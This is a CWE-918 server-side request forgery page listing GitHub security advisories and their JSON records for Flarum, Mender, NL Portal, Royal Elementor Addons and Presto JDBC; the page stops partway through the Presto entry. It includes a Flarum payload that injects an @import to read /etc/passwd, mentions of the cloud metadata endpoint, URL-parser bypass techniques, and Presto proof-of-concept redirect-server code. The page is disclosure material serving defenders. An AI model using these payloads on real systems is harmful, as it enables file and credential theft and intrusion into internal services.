Common Weakness Enumeration

CWE-918

Allowed

Server-Side Request Forgery (SSRF)

Abstraction: Base · Status: Incomplete

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

4606 vulnerabilities reference this CWE, most recent first.

GHSA-XJVC-PW2R-6878

Vulnerability from github – Published: 2026-04-22 20:34 – Updated: 2026-05-13 13:30
VLAI
Summary
Flarum: Path traversal in LESS parser via theme color settings (incomplete fix for CVE-2023-27577)
Details

Summary

Flarum's patch for CVE-2023-27577 restricted the @import and data-uri() LESS features in the custom_less setting, but the same restriction was never applied to other settings registered as LESS config variables (for example theme_primary_color and theme_secondary_color, as well as any key registered via Extend\Settings::registerLessConfigVar()).

Those values are interpolated verbatim into the LESS source at compile time, allowing an authenticated administrator to craft a theme-color value that injects an arbitrary @import directive into the compiled forum.css. Because the underlying LESS parser honours @import (inline) '<path>', an attacker can read arbitrary files reachable by the PHP process (local file inclusion) or trigger outbound HTTP(S) requests (server-side request forgery).

Impact

An attacker who has compromised — or legitimately obtained — an administrator account can:

  • Read arbitrary local files reachable by the PHP process (e.g. /etc/passwd, .env, config files containing database credentials, OAuth secrets, API keys).
  • Trigger outbound HTTP/HTTPS requests from the Flarum host, enabling SSRF against internal services and cloud metadata endpoints such as http://169.254.169.254/ (AWS IMDSv1, GCP, Azure).

The contents of the attacker-controlled import are embedded into the compiled forum.css, which is publicly served — so the attacker can retrieve whatever was read simply by fetching the CSS file.

This is a privilege-escalation vulnerability: a forum administrator is not intended to have host-level file read or access to internal network resources.

Example payload

Submitted via POST /api/settings with an admin session:

{ "theme_primary_color": "#4D698E;@import (inline) '/etc/passwd';" }

The setting is stored verbatim, interpolated into the LESS source on the next CSS compile, and the target file's contents appear in /assets/forum.css.

Patches

  • flarum/core 1.8.16 — fix for the 1.x branch.
  • flarum/core 2.0.0-rc.1 — fix for the 2.x branch.

The fix extends the existing @import / data-uri() validation in Flarum\Forum\ValidateCustomLess::whenSettingsSaving to every dirty setting whose key is registered as a LESS config variable, not just custom_less.

Workarounds

If upgrading is not immediately possible:

  • Ensure administrator accounts are protected with strong, unique passwords and (where supported) two-factor authentication.
  • Restrict administrator access to trusted users only.
  • Review the forum's public forum.css for unexpected content that could indicate prior exploitation.

There is no configuration-level mitigation on affected versions — the fix requires the upgraded code.

Resources

Credit

Reported to the Flarum Foundation by William (Liam) Snow IV (@LiamSnow), discovered during a graduate-level network security lab at Worcester Polytechnic Institute.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.8.15"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "flarum/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.8.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.0.0-beta.8"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "flarum/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0-beta.1"
            },
            {
              "fixed": "2.0.0-rc.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41887"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-22T20:34:52Z",
    "nvd_published_at": "2026-05-08T17:16:30Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nFlarum\u0027s patch for [CVE-2023-27577](https://github.com/flarum/framework/security/advisories/GHSA-vhm8-wwrf-3gcw) restricted the `@import` and `data-uri()` LESS features in the `custom_less` setting, but the same restriction was never applied to other settings registered as LESS config variables (for example `theme_primary_color` and `theme_secondary_color`, as well as any key registered via `Extend\\Settings::registerLessConfigVar()`).\n\nThose values are interpolated verbatim into the LESS source at compile time, allowing an authenticated administrator to craft a theme-color value that injects an arbitrary `@import` directive into the compiled `forum.css`. Because the underlying LESS parser honours `@import (inline) \u0027\u003cpath\u003e\u0027`, an attacker can read arbitrary files reachable by the PHP process (local file inclusion) or trigger outbound HTTP(S) requests (server-side request forgery).\n\n## Impact\n\nAn attacker who has compromised \u2014 or legitimately obtained \u2014 an administrator account can:\n\n- **Read arbitrary local files** reachable by the PHP process (e.g. `/etc/passwd`, `.env`, config files containing database credentials, OAuth secrets, API keys).\n- **Trigger outbound HTTP/HTTPS requests** from the Flarum host, enabling SSRF against internal services and cloud metadata endpoints such as `http://169.254.169.254/` (AWS IMDSv1, GCP, Azure).\n\nThe contents of the attacker-controlled import are embedded into the compiled `forum.css`, which is publicly served \u2014 so the attacker can retrieve whatever was read simply by fetching the CSS file.\n\nThis is a privilege-escalation vulnerability: a forum administrator is not intended to have host-level file read or access to internal network resources.\n\n### Example payload\n\nSubmitted via `POST /api/settings` with an admin session:\n\n```json\n{ \"theme_primary_color\": \"#4D698E;@import (inline) \u0027/etc/passwd\u0027;\" }\n```\n\nThe setting is stored verbatim, interpolated into the LESS source on the next CSS compile, and the target file\u0027s contents appear in `/assets/forum.css`.\n\n## Patches\n\n- **`flarum/core` 1.8.16** \u2014 fix for the 1.x branch.\n- **`flarum/core` 2.0.0-rc.1** \u2014 fix for the 2.x branch.\n\nThe fix extends the existing `@import` / `data-uri()` validation in `Flarum\\Forum\\ValidateCustomLess::whenSettingsSaving` to every dirty setting whose key is registered as a LESS config variable, not just `custom_less`.\n\n## Workarounds\n\nIf upgrading is not immediately possible:\n\n- Ensure administrator accounts are protected with strong, unique passwords and (where supported) two-factor authentication.\n- Restrict administrator access to trusted users only.\n- Review the forum\u0027s public `forum.css` for unexpected content that could indicate prior exploitation.\n\nThere is no configuration-level mitigation on affected versions \u2014 the fix requires the upgraded code.\n\n## Resources\n\n- [CVE-2023-27577](https://nvd.nist.gov/vuln/detail/CVE-2023-27577) \u2014 the original vulnerability whose patch was incomplete.\n- [GHSA-vhm8-wwrf-3gcw](https://github.com/flarum/framework/security/advisories/GHSA-vhm8-wwrf-3gcw) \u2014 the original advisory.\n\n## Credit\n\nReported to the Flarum Foundation by **William (Liam) Snow IV** ([@LiamSnow](https://github.com/LiamSnow)), discovered during a graduate-level network security lab at Worcester Polytechnic Institute.",
  "id": "GHSA-xjvc-pw2r-6878",
  "modified": "2026-05-13T13:30:21Z",
  "published": "2026-04-22T20:34:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/flarum/framework/security/advisories/GHSA-vhm8-wwrf-3gcw"
    },
    {
      "type": "WEB",
      "url": "https://github.com/flarum/framework/security/advisories/GHSA-xjvc-pw2r-6878"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27577"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41887"
    },
    {
      "type": "WEB",
      "url": "https://github.com/flarum/framework/commit/2d90a1f19f0e46f8c7e1b07c48ba74b5e38f8410"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/flarum/framework"
    },
    {
      "type": "WEB",
      "url": "https://github.com/flarum/framework/releases/tag/v1.8.16"
    },
    {
      "type": "WEB",
      "url": "https://github.com/flarum/framework/releases/tag/v2.0.0-rc.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Flarum: Path traversal in LESS parser via theme color settings (incomplete fix for CVE-2023-27577)"
}

GHSA-XJWM-593F-HR6X

Vulnerability from github – Published: 2024-11-08 18:30 – Updated: 2024-11-08 21:33
VLAI
Details

Northern.tech Hosted Mender before 2024.07.11 allows SSRF.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-47190"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-08T16:15:24Z",
    "severity": "LOW"
  },
  "details": "Northern.tech Hosted Mender before 2024.07.11 allows SSRF.",
  "id": "GHSA-xjwm-593f-hr6x",
  "modified": "2024-11-08T21:33:57Z",
  "published": "2024-11-08T18:30:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47190"
    },
    {
      "type": "WEB",
      "url": "https://mender.io/blog/cve-2024-46947-cve-2024-47190-ssrf-issues-in-mender-enterprise-server"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XM2P-HXQ8-XJ3Q

Vulnerability from github – Published: 2024-03-05 18:31 – Updated: 2025-03-20 06:31
VLAI
Details

A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-27564"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-05T17:15:06Z",
    "severity": "MODERATE"
  },
  "details": "A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.",
  "id": "GHSA-xm2p-hxq8-xj3q",
  "modified": "2025-03-20T06:31:08Z",
  "published": "2024-03-05T18:31:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27564"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dirk1983/chatgpt/issues/114"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/save/https://github.com/dirk1983/chatgpt/blob/f9f4bbc99eed7210b291ec116bd57b3d8276bee5/README.md"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/save/https://github.com/dirk1983/chatgpt/issues/114"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20250320031248/https://mm1.ltd"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20250320032559/https://github.com/dirk1983/chatgpt/blob/f9f4bbc99eed7210b291ec116bd57b3d8276bee5/pictureproxy.php"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XM3X-9CFW-JHX4

Vulnerability from github – Published: 2026-06-19 14:17 – Updated: 2026-06-19 14:17
VLAI
Summary
NL Portal Backend Libraries: Unauthenticated form resolver forwards the privileged Objecten-API token to a caller-supplied URL (SSRF)
Details

Summary

The public GraphQL resolvers getFormDefinitionByObjectenApiUrl(url) and the deprecated getFormDefinitionById(id) fetch a caller-supplied URL using the privileged Objecten-API token. Because the /graphql endpoint is permitAll() and these resolvers do not declare a CommonGroundAuthentication parameter, an unauthenticated caller can make the backend issue an outbound request carrying Authorization: Token <objecten-api-token> to a caller-influenced URL on the configured Objecten-API host. This is a constrained (same-host) server-side request forgery combined with missing authorization.

Reported responsibly and confirmed in a local lab build against the project's own WebFlux security stack. No production system was accessed.

Affected

  • nl.nl-portal:form (the public resolver / entry point) together with nl.nl-portal:objectenapi (where the host guard lives).
  • First shipped in 1.1.0.RELEASE (2023-10-31); the vulnerable code was introduced on 2023-08-12 (commit b2f87ca) and is present in every release since (1.1.x, 1.2.5, 1.3.0, the 3.0.x line, and 3.1.0 / next-minor, HEAD 45abcd2). Fixed in 3.0.4.RELEASE (see Fix below).

Data flow (confirmed in source)

  1. form/.../graphql/FormDefinitionQuery.kt@QueryMapping getFormDefinitionByObjectenApiUrl(@Argument url), no CommonGroundAuthentication parameter (same for getFormDefinitionById).
  2. form/.../service/ObjectsApiFormDefinitionService.kt — passes the URL through unvalidated.
  3. zgw/objectenapi/.../service/ObjectenApiService.kt getObjectByUrl(url) — the only guard is host equality (URI.create(url).host == objectsApiClientConfig.url.host); no scheme/port/path check.
  4. zgw/objectenapi/.../client/ObjectsApiClient.kt getObjectByUrl(url) via webClientWithoutBaseUrl(), which attaches the default header Authorization: Token <token> to the fully caller-supplied URL.

Reachability: /graphql is permitAll() (core/.../security/OauthSecurityAutoConfiguration.kt). Authentication is only enforced on resolvers that declare a CommonGroundAuthentication parameter; these do not, and there is no @PreAuthorize/instrumentation safety net. The project's own GraphQLEndpointAuthorizationIT lists getFormDefinitionByObjectenApiUrl as an intentionally public operation — so the unauthenticated reachability is by design; the defect is that an intentionally-public resolver forwards a privileged token to a caller-influenced URL.

Secondary (defense-in-depth): zgw/zaken-api/.../service/ZakenApiService.kt getZaakDetails calls objectsApiClient.getObjectByUrl directly, bypassing the service-level host guard. It is currently only reachable via the authenticated ZaakQuery.zaakdetails field resolver with server-derived URLs, so it is not an unauthenticated vector today — but it shows why the guard belongs in the client.

Proof of concept (lab, against the real WebFlux stack)

  • An unauthenticated POST /graphql calling getFormDefinitionByObjectenApiUrl(url: ...) executes without authentication.
  • With the configured Objecten-API host pointed at a mock server, an outbound request to a caller-chosen port/path on that host carried Authorization: Token <configured-token> — confirming the token is attached to caller-influenced URLs.

Impact and severity — important limitations

Assessed as Medium because two code-level facts constrain practical impact:

  1. No cross-host SSRF / token exfiltration in standard deployments. The token only travels to the configured Objecten-API host. Exfiltration requires an attacker-controlled listener at that host (a different port/path routing elsewhere) — generally not the case in managed deployments. A range of URL-parser bypass payloads was tested (userinfo @, %2f/%00/%09, backslash, #/?, double-host, trailing-dot, IDN/Unicode full-stop, fraction-slash, IPv6); no parser differential was found between the java.net.URI-based guard and the Spring/Netty URI builder used by WebClient — every payload either kept the request on the configured host or was rejected (fail-closed). The lab token-leak PoC works only because the configured host there is localhost; this does not generalize to production.

  2. Arbitrary PII object read is blocked by typed deserialization. The response is deserialized into ObjectsApiObject<ObjectsApiFormIoFormDefinition>, whose envelope fields and data.formDefinition are all non-nullable Kotlin properties (Jackson KotlinModule registered). An object without a top-level data.formDefinition (e.g. taken/berichten/zaakdetails) fails to deserialize (DecodingException) and returns no data. The resolver can therefore only return objects shaped like a form definition — and form definitions are intentionally public (loaded pre-login).

Escalation conditions that would raise severity toward High: - the Objecten-API host shares infrastructure with an attacker-controllable endpoint (other port/path), enabling capture of the privileged token; or - a URL-parser differential is later found that escapes the host guard.

Remediation

  • Move the host validation out of ObjectenApiService.getObjectByUrl and into ObjectsApiClient.getObjectByUrl so the direct caller ZakenApiService.getZaakDetails is covered too, and tighten it from host-only to scheme + host + port + path-prefix. Preferably, do not accept a full URL at all: validate/extract the object UUID and rebuild the URL from the fixed configured base (reuse the existing ObjectsApiClient.getObjectById pattern, /api/v2/objects/{uuid}).
  • Separately decide whether getFormDefinitionByObjectenApiUrl / getFormDefinitionById should remain unauthenticated. They are currently intentionally public (forms load before login); for a stricter posture, add a CommonGroundAuthentication parameter as in the other resolvers — noting this breaks pre-login form loading.

Credit

Reported responsibly by Ray Sabee (https://whitehatsecurity.nl), independent security researcher — GitHub @raysabee.

Fix

Fixed in 3.0.4.RELEASE (commit 39ad80f, PR #700, "rework form module"): - The unauthenticated resolvers getFormDefinitionByObjectenApiUrl and the deprecated getFormDefinitionById were removed from both FormDefinitionQuery and the GraphQL schema. - getFormDefinitionByName now requires a CommonGroundAuthentication parameter (no longer public). - The URL-based service method findObjectsApiFormDefinitionByUrl(url) was removed and replaced by getObjectsApiFormDefinitionById(objectId: UUID), which fetches by UUID via the fixed /api/v2/objects/{uuid} path (no caller-supplied URL, so no SSRF) and validates the object type against the configured form-definition object type. - Form definitions are now retrieved through the new authenticated query getFormDefinitionByTaskId(taskId) in nl.nl-portal:taak, which authorizes the caller against the task (CommonGroundAuthentication, BSN/KVK match, else 401) and derives the form-definition UUID from the task's own server-side data, not from caller input. - No resolver feeds caller-controlled input into ObjectenApiService.getObjectByUrl anymore. The objectenapi module itself was not changed; the fix lives entirely in nl.nl-portal:form and the new nl.nl-portal:taak query.

Upgrade instructions

  • Backend: upgrade nl.nl-portal:* to 3.0.4 (or later).
  • Frontend: upgrade nl-portal-frontend-libraries to v3.0.3 (or later). This is required: the removed GraphQL queries (getFormDefinitionByObjectenApiUrl, getFormDefinitionById) and the now-authenticated getFormDefinitionByName are a breaking change. Frontend v3.0.3 uses the new authenticated getFormDefinitionByTaskId / getFormDefinitionByName queries.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "nl.nl-portal:form"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.0"
            },
            {
              "fixed": "3.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55414"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T14:17:18Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe public GraphQL resolvers `getFormDefinitionByObjectenApiUrl(url)` and the deprecated `getFormDefinitionById(id)` fetch a caller-supplied URL using the **privileged Objecten-API token**. Because the `/graphql` endpoint is `permitAll()` and these resolvers do not declare a `CommonGroundAuthentication` parameter, an **unauthenticated** caller can make the backend issue an outbound request carrying `Authorization: Token \u003cobjecten-api-token\u003e` to a **caller-influenced URL on the configured Objecten-API host**. This is a constrained (same-host) server-side request forgery combined with missing authorization.\n\nReported responsibly and confirmed in a local lab build against the project\u0027s own WebFlux security stack. No production system was accessed.\n\n## Affected\n\n- `nl.nl-portal:form` (the public resolver / entry point) together with `nl.nl-portal:objectenapi` (where the host guard lives).\n- First shipped in **1.1.0.RELEASE** (2023-10-31); the vulnerable code was introduced on 2023-08-12 (commit `b2f87ca`) and is present in every release since (1.1.x, 1.2.5, 1.3.0, the 3.0.x line, and 3.1.0 / `next-minor`, HEAD `45abcd2`). Fixed in 3.0.4.RELEASE (see Fix below).\n\n## Data flow (confirmed in source)\n\n1. `form/.../graphql/FormDefinitionQuery.kt` \u2014 `@QueryMapping getFormDefinitionByObjectenApiUrl(@Argument url)`, **no** `CommonGroundAuthentication` parameter (same for `getFormDefinitionById`).\n2. \u2192 `form/.../service/ObjectsApiFormDefinitionService.kt` \u2014 passes the URL through unvalidated.\n3. \u2192 `zgw/objectenapi/.../service/ObjectenApiService.kt` `getObjectByUrl(url)` \u2014 the only guard is host equality (`URI.create(url).host == objectsApiClientConfig.url.host`); **no scheme/port/path check**.\n4. \u2192 `zgw/objectenapi/.../client/ObjectsApiClient.kt` `getObjectByUrl(url)` via `webClientWithoutBaseUrl()`, which attaches the default header `Authorization: Token \u003ctoken\u003e` to the fully caller-supplied URL.\n\n**Reachability:** `/graphql` is `permitAll()` (`core/.../security/OauthSecurityAutoConfiguration.kt`). Authentication is only enforced on resolvers that declare a `CommonGroundAuthentication` parameter; these do not, and there is no `@PreAuthorize`/instrumentation safety net. The project\u0027s own `GraphQLEndpointAuthorizationIT` lists `getFormDefinitionByObjectenApiUrl` as an intentionally public operation \u2014 so the unauthenticated reachability is by design; the defect is that an intentionally-public resolver forwards a privileged token to a caller-influenced URL.\n\n**Secondary (defense-in-depth):** `zgw/zaken-api/.../service/ZakenApiService.kt` `getZaakDetails` calls `objectsApiClient.getObjectByUrl` **directly**, bypassing the service-level host guard. It is currently only reachable via the authenticated `ZaakQuery.zaakdetails` field resolver with server-derived URLs, so it is not an unauthenticated vector today \u2014 but it shows why the guard belongs in the client.\n\n## Proof of concept (lab, against the real WebFlux stack)\n\n- An unauthenticated `POST /graphql` calling `getFormDefinitionByObjectenApiUrl(url: ...)` executes without authentication.\n- With the configured Objecten-API host pointed at a mock server, an outbound request to a **caller-chosen port/path on that host** carried `Authorization: Token \u003cconfigured-token\u003e` \u2014 confirming the token is attached to caller-influenced URLs.\n\n## Impact and severity \u2014 important limitations\n\nAssessed as **Medium** because two code-level facts constrain practical impact:\n\n1. **No cross-host SSRF / token exfiltration in standard deployments.** The token only travels to the *configured* Objecten-API host. Exfiltration requires an attacker-controlled listener at that host (a different port/path routing elsewhere) \u2014 generally not the case in managed deployments. A range of URL-parser bypass payloads was tested (userinfo `@`, `%2f`/`%00`/`%09`, backslash, `#`/`?`, double-host, trailing-dot, IDN/Unicode full-stop, fraction-slash, IPv6); **no parser differential** was found between the `java.net.URI`-based guard and the Spring/Netty URI builder used by WebClient \u2014 every payload either kept the request on the configured host or was rejected (fail-closed). The lab token-leak PoC works only because the configured host there is `localhost`; this does not generalize to production.\n\n2. **Arbitrary PII object read is blocked by typed deserialization.** The response is deserialized into `ObjectsApiObject\u003cObjectsApiFormIoFormDefinition\u003e`, whose envelope fields and `data.formDefinition` are all non-nullable Kotlin properties (Jackson `KotlinModule` registered). An object without a top-level `data.formDefinition` (e.g. taken/berichten/zaakdetails) fails to deserialize (`DecodingException`) and returns no data. The resolver can therefore only return objects shaped like a form definition \u2014 and form definitions are intentionally public (loaded pre-login).\n\n**Escalation conditions** that would raise severity toward High:\n- the Objecten-API host shares infrastructure with an attacker-controllable endpoint (other port/path), enabling capture of the privileged token; or\n- a URL-parser differential is later found that escapes the host guard.\n\n## Remediation\n\n- Move the host validation out of `ObjectenApiService.getObjectByUrl` and into `ObjectsApiClient.getObjectByUrl` so the direct caller `ZakenApiService.getZaakDetails` is covered too, and tighten it from host-only to **scheme + host + port + path-prefix**. Preferably, do not accept a full URL at all: validate/extract the object UUID and rebuild the URL from the fixed configured base (reuse the existing `ObjectsApiClient.getObjectById` pattern, `/api/v2/objects/{uuid}`).\n- Separately decide whether `getFormDefinitionByObjectenApiUrl` / `getFormDefinitionById` should remain unauthenticated. They are currently intentionally public (forms load before login); for a stricter posture, add a `CommonGroundAuthentication` parameter as in the other resolvers \u2014 noting this breaks pre-login form loading.\n\n## Credit\n\nReported responsibly by **Ray Sabee** (https://whitehatsecurity.nl), independent security researcher \u2014 GitHub [@raysabee](https://github.com/raysabee).\n\n\n## Fix\n\nFixed in **3.0.4.RELEASE** (commit `39ad80f`, PR #700, \"rework form module\"):\n- The unauthenticated resolvers `getFormDefinitionByObjectenApiUrl` and the deprecated `getFormDefinitionById` were **removed** from both `FormDefinitionQuery` and the GraphQL schema.\n- `getFormDefinitionByName` now requires a `CommonGroundAuthentication` parameter (no longer public).\n- The URL-based service method `findObjectsApiFormDefinitionByUrl(url)` was removed and replaced by `getObjectsApiFormDefinitionById(objectId: UUID)`, which fetches by UUID via the fixed `/api/v2/objects/{uuid}` path (no caller-supplied URL, so no SSRF) and validates the object type against the configured form-definition object type.\n- Form definitions are now retrieved through the new authenticated query `getFormDefinitionByTaskId(taskId)` in `nl.nl-portal:taak`, which authorizes the caller against the task (`CommonGroundAuthentication`, BSN/KVK match, else `401`) and derives the form-definition UUID from the task\u0027s own server-side data, not from caller input.\n- No resolver feeds caller-controlled input into `ObjectenApiService.getObjectByUrl` anymore. The `objectenapi` module itself was not changed; the fix lives entirely in `nl.nl-portal:form` and the new `nl.nl-portal:taak` query.\n\n## Upgrade instructions\n\n- **Backend:** upgrade `nl.nl-portal:*` to **3.0.4** (or later).\n- **Frontend:** upgrade `nl-portal-frontend-libraries` to **v3.0.3** (or later). This is required: the removed GraphQL queries (`getFormDefinitionByObjectenApiUrl`, `getFormDefinitionById`) and the now-authenticated `getFormDefinitionByName` are a breaking change. Frontend v3.0.3 uses the new authenticated `getFormDefinitionByTaskId` / `getFormDefinitionByName` queries.",
  "id": "GHSA-xm3x-9cfw-jhx4",
  "modified": "2026-06-19T14:17:18Z",
  "published": "2026-06-19T14:17:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nl-portal/nl-portal-backend-libraries/security/advisories/GHSA-xm3x-9cfw-jhx4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nl-portal/nl-portal-backend-libraries/pull/700"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nl-portal/nl-portal-backend-libraries"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "NL Portal Backend Libraries: Unauthenticated form resolver forwards the privileged Objecten-API token to a caller-supplied URL (SSRF)"
}

GHSA-XM79-W8W3-C5R7

Vulnerability from github – Published: 2026-05-02 09:31 – Updated: 2026-05-02 09:31
VLAI
Details

The Royal Elementor Addons plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 1.7.1057. This is due to insufficient validation of user-supplied URLs in the render_csv_data() function, which can be bypassed by including 'docs.google.com/spreadsheets' in a query parameter, and the subsequent use of these URLs in fopen() calls without blocking internal or private network addresses. This makes it possible for authenticated attackers, with Contributor-level access and above, to make requests to arbitrary URLs and retrieve sensitive information from internal services.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-6229"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-02T08:16:27Z",
    "severity": "HIGH"
  },
  "details": "The Royal Elementor Addons plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 1.7.1057. This is due to insufficient validation of user-supplied URLs in the render_csv_data() function, which can be bypassed by including \u0027docs.google.com/spreadsheets\u0027 in a query parameter, and the subsequent use of these URLs in fopen() calls without blocking internal or private network addresses. This makes it possible for authenticated attackers, with Contributor-level access and above, to make requests to arbitrary URLs and retrieve sensitive information from internal services.",
  "id": "GHSA-xm79-w8w3-c5r7",
  "modified": "2026-05-02T09:31:15Z",
  "published": "2026-05-02T09:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6229"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1049/modules/data-table/widgets/wpr-data-table.php#L1832"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1049/modules/data-table/widgets/wpr-data-table.php#L1873"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1049/modules/data-table/widgets/wpr-data-table.php#L1918"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/tags/1.7.1049/modules/data-table/widgets/wpr-data-table.php#L2075"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/data-table/widgets/wpr-data-table.php#L1832"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/data-table/widgets/wpr-data-table.php#L1873"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/data-table/widgets/wpr-data-table.php#L1918"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/data-table/widgets/wpr-data-table.php#L2075"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026old=3514363%40royal-elementor-addons\u0026new=3514363%40royal-elementor-addons\u0026sfp_email=\u0026sfph_mail="
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9744055a-b199-4945-afcc-4f5b85f5f1e8?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XM7X-F3W2-4HJM

Vulnerability from github – Published: 2023-10-03 21:54 – Updated: 2023-10-03 21:54
VLAI
Summary
Presto JDBC Server-Side Request Forgery by redirect
Details

Summary

Presto JDBC is vulnerable to Server-Side Request Forgery (SSRF) when connecting a remote Presto server. An attacker can construct a redirect response that Presto JDBC client will follow and view sensitive information from highly sensitive internal servers or perform a local port scan.

Details

Presto JDBC client uses OkHttp to send POST /v1/statement and GET /v1/info requests to the remote Presto server. And OkHttp will follow 301 and 302 redirect by default. In addition, JDBC will manually follow 307 and 308 redirect. Therefore, if a malicious server returns a 30x redirect, JDBC client will follow the redirect and cause SSRF.

For unexpected responses, JDBC will put the response body into the error. So the response of the internal server will be leaked if the server also returns the error directly to the user.

The relevant code is in file path /presto-client/src/main/java/com/facebook/presto/client/StatementClientV1.java and function StatementClientV1 .

The flowchart is as follows:

trino_jdbc_ssrf_1.png

PoC

Running an HTTP service to route POST /v1/statement redirect to the intranet. For example, using these Python code:

from flask import Flask, redirect

app = Flask(__name__)

@app.route('/v1/statement', methods=['POST'])
def redirect_to_interal_server():
    return redirect('http://127.0.0.1:8888', code=302)

if __name__ == '__main__':
    app.run(host="0.0.0.0",port=8000)

Connecting to the malicious server using JDBC:

String url = "jdbc:presto://<ip>:<port>";
Properties properties = new Properties();
properties.setProperty("user", "root");
try {
    Connection connection = DriverManager.getConnection(url, properties);
    Statement stmt = connection.createStatement();
    ResultSet res = stmt.executeQuery("show catalogs");
    while(res.next()) {
        System.out.println(res.getString(1));
    }
} catch (Exception e) {
    e.printStackTrace();
}

Pwned!

Impact

When the target remote Presto server to be connected is controllable, an attacker can view sensitive information from highly sensitive internal servers or perform a local port scan.

Others

